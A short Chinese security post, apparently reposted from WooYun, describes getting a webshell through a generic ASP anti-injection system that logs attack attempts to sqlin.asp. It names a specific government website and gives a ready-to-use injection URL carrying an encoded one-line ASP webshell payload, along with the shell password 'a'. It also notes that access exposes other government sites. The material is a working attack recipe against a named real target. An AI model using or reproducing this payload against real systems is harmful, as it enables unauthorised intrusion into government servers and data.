直接给asp防注入getwebshell

这些网站都用的通用防注入系统
有个别网站的目录存在sqlin.asp保存注入记录  可以写入一句话木马
比如http://pzzl.gov.cn/news_type.asp?id=1413 and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾
可在http://pzzl.gov.cn/sqlin.asp写入一句话,密码a
连接上去可以看到另外的几个政府网站

本文转自乌云由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。